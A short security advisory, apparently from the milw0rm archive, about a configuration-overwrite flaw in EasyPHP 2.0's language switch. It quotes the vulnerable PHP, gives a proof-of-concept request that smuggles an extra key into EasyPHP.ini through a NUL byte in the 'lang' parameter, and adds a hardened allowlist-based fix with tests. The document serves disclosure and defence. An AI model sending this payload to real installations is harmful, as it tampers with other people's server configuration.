Bug : Arbitrary Modify Configuration File
Vendor : EasyPHP
Vendor URI : http://sourceforge.net/projects/quickeasyphp/
Product : EasyPHP 2.0
Author : Zigma [zigmatn @ gmail.com]
http://NullArea.NET

Description :

EasyPHP is a WAMP software bundle that installs web server services onto a Windows computer and allows quick-and-easy development with PHP and MySQL on localhost (also known as 127.0.0.1).
The package includes an Apache server, a MySQL database, and the PHP extension.

[+] Analysis :

A quick look at i18n.inc:

if (isset($_GET['lang']) AND $_GET['lang'] != $lang)
{
    $fp = fopen($filename, "r");
    $ini_contents = fread($fp, filesize($filename));
    fclose($fp);
    $ini_contents = str_replace("LangAdmin=".$lang, "LangAdmin=".$_GET['lang'], $ini_contents); // <--
    $fp = fopen($filename, "w");
    fputs($fp,$ini_contents);
    fclose($fp);
    Header("Location: " . $_SERVER['PHP_SELF']);
    exit;
}

EasyPHP does not verify user input (the lang parameter), which leads to an arbitrary overwrite of the EasyPHP configuration file (EasyPHP.ini).

[+] Proof Of Concept :

The request :

http://localhost/index.php?lang=fr%00Lang=Overwritten

results in EasyPHP.ini being overwritten, adding the string "Lang=Overwritten".

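A hardened form of the language switch shown in the analysis, as an added example that is not EasyPHP's code or part of the original advisory. The function name set_admin_lang and the allowlist of language codes are assumptions; only the LangAdmin key comes from the snippet above.

```php
<?php
// Added example, not EasyPHP's code. set_admin_lang() and the allowlist
// passed to it are assumptions made for illustration.

/**
 * Update the LangAdmin entry only when $requested is a known language code.
 * Returns true when the file was rewritten, false when the value was refused
 * or the file could not be read or written.
 */
function set_admin_lang(string $iniPath, string $requested, array $allowed): bool
{
    // Strict allowlist match: a value carrying a NUL byte, CR/LF or an extra
    // "key=value" pair can never equal one of the fixed codes.
    if (!in_array($requested, $allowed, true)) {
        return false;
    }

    $contents = file_get_contents($iniPath);
    if ($contents === false) {
        return false;
    }

    // Rewrite the value of the single LangAdmin line, leaving line endings
    // and every other key untouched.
    $updated = preg_replace('/^LangAdmin=[^\r\n]*/m', 'LangAdmin=' . $requested, $contents, 1, $count);
    if ($updated === null || $count !== 1) {
        return false;
    }

    return file_put_contents($iniPath, $updated, LOCK_EX) !== false;
}

// Constructed demo on a temporary file standing in for EasyPHP.ini.
$ini = tempnam(sys_get_temp_dir(), 'ini');
file_put_contents($ini, "[EasyPHP]\r\nLangAdmin=en\r\nOther=1\r\n");
$allowed = ['en', 'fr'];   // assumed set of shipped language codes

var_dump(set_admin_lang($ini, 'fr', $allowed));                      // allowlisted code
var_dump(set_admin_lang($ini, "fr\0Lang=Overwritten", $allowed));    // decoded value from the request above
var_dump(set_admin_lang($ini, "fr\r\nLang=Overwritten", $allowed));  // constructed CR/LF variant
echo file_get_contents($ini);
unlink($ini);
```
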
# milw0rm.com [2009-05-11]